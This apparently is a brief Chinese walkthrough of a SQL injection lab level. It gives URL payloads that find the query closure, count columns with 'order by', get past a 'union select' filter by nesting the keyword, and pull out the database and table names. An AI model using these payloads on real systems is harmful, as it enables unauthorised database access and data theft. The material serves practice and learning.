0X01构造闭合 爆字段数
/?id=1') order by 1%23
?id=1') order by 5%23
偷看一下源码
就只过滤了union select
闭合')
那我们来尝试一下
0X02爆库名
用我们28关的语句继续构造
-1') uniounion selectn select 1,database(),3%23
0X02爆表名
/?id=-1') uniounion selectn select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3%23
学习之路 少就是多 慢就是快